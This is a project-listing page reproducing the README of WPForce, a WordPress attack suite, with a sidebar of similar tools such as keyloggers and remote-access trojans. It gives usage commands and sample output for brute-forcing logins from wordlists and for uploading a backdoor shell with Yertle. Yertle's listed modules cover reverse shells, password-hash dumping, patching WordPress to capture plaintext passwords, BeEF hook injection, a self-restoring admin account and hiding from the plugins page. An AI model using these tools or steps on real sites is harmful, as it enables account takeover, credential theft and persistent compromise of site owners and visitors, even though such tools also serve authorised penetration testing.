n00py / Wpforce
Licence: bsd-2-clause
Wordpress Attack Suite
Stars: ✭ 633
Programming Languages
javascript
184084 projects - #8 most used programming language
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Wpforce
SpyGen
Trojan 🐍 (keylogger, take screenshots, open your webcam) 🔓
Stars: ✭ 115 (-81.83%)
Mutual labels: keylogger, hacking-tool
Keylogger
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Stars: ✭ 604 (-4.58%)
Mutual labels: hacking-tool, keylogger
Sn1per
Attack Surface Management Platform | Sn1perSecurity LLC
Stars: ✭ 4,897 (+673.62%)
Mutual labels: hacking-tool, pentest-tool
crawleet
Web Recon & Exploitation Tool.
Stars: ✭ 48 (-92.42%)
Mutual labels: hacking-tool, pentest-tool
Osmedeus
Fully automated offensive security framework for reconnaissance and vulnerability scanning
Stars: ✭ 3,391 (+435.7%)
Mutual labels: hacking-tool, pentest-tool
paradoxiaRAT
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 583 (-7.9%)
Mutual labels: keylogger, hacking-tool
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: ✭ 415 (-34.44%)
Mutual labels: keylogger, reverse-shell
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (-37.6%)
Mutual labels: hacking-tool, keylogger
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-94.47%)
Mutual labels: reverse-shell, pentest-tool
Yasuo
A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network
Stars: ✭ 517 (-18.33%)
Mutual labels: hacking-tool, pentest-tool
SimpleKeylogger
Simple Keylogger with smtp to send emails on your account using python works on linux and Windows
Stars: ✭ 32 (-94.94%)
Mutual labels: keylogger, hacking-tool
Malware-with-Backdoor-and-Keylogger
👨🏻💻 A great tool for Ethical Hackers, a malware programmed with Backdoor and Keylogger.
Stars: ✭ 25 (-96.05%)
Mutual labels: keylogger, hacking-tool
pentesting-dockerfiles
Pentesting/Bugbounty Dockerfiles.
Stars: ✭ 148 (-76.62%)
Mutual labels: hacking-tool, pentest-tool
Okadminfinder3
[ Admin panel finder / Admin Login Page Finder ] ¢σ∂є∂ ву 👻 (❤-❤) 👻
Stars: ✭ 279 (-55.92%)
Mutual labels: hacking-tool, pentest-tool
awesome-pentest-tools
List of Security Archives Tools and software, generally for facilitate security & penetration research. Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand.
Stars: ✭ 34 (-94.63%)
Mutual labels: hacking-tool, pentest-tool
KeyLy
A powerfull and awesome Keylogger(Your keyboard and your mouse) realy helpfull for hackers! :-P (C/C++)
Stars: ✭ 17 (-97.31%)
Mutual labels: keylogger, hacking-tool
Impost3r
👻Impost3r -- A linux password thief
Stars: ✭ 355 (-43.92%)
Mutual labels: pentest-tool, keylogger
Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (-25.12%)
Mutual labels: hacking-tool, pentest-tool
WPForce - Wordpress Attack Suite
ABOUT:
WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules.
For more information, visit the blog post here: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
Blogs in other languages:
Chinese - www.mottoin.com/100381.html
Portuguese - http://www.100security.com.br/wpforce/
Spanish - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
Russian - https://hackware.ru/?p=2547
French - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/
Turkish - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
FEATURES:
- Brute Force via API, not login form bypassing some forms of protection
- Can automatically upload an interactive shell
- Can be used to spawn a full featured reverse shell
- Dumps WordPress password hashes
- Can backdoor authentication function for plaintext password collection
- Inject BeEF hook into all pages
- Pivot to meterpreter if needed
INSTALL:
Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/
USAGE:
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || |
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input file name
-w WORDLIST, --wordlist WORDLIST
Wordlist file name
-u URL, --url URL URL of target
-v, --verbose Verbose output. Show the attemps as they happen.
-t THREADS, --threads THREADS
Determines the number of threads to be used, default
is 10
-a AGENT, --agent AGENT
Determines the user-agent
-d, --debug This option is used for determining issues with the
script.
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
_..---.--. __ __ _ _
.'\ __|/O.__) \ \ / /__ _ __| |_| | ___
/__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \.
(____.'.-_\____) | | __/ | | |_| | __/
(_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___|
(_..)--(.._)'--' ~n00py~
Post-exploitation Module for Wordpress
Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>
-h, --help show this help message and exit
-i, --interactive Interactive command shell
-r, --reverse Reverse Shell
-t TARGET, --target TARGET
URL of target
-u USERNAME, --username USERNAME
Admin username
-p PASSWORD, --password PASSWORD
Admin password
-li IP, --ip IP Listener IP
-lp PORT, --port PORT
Listener Port
-v, --verbose Verbose output.
-e EXISTING, --existing EXISTING
Skips uploading a shell, and connects to existing
shell
Yertle currently contains these modules:
Core Commands
=============
Command Description
------- -----------
? Help menu
beef Injects a BeEF hook into website
dbcreds Prints the database credentials
exit Terminate the session
hashdump Dumps all WordPress password hashes
help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager to connect to metasploit
persist Creates an admin account that will re-add itself
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].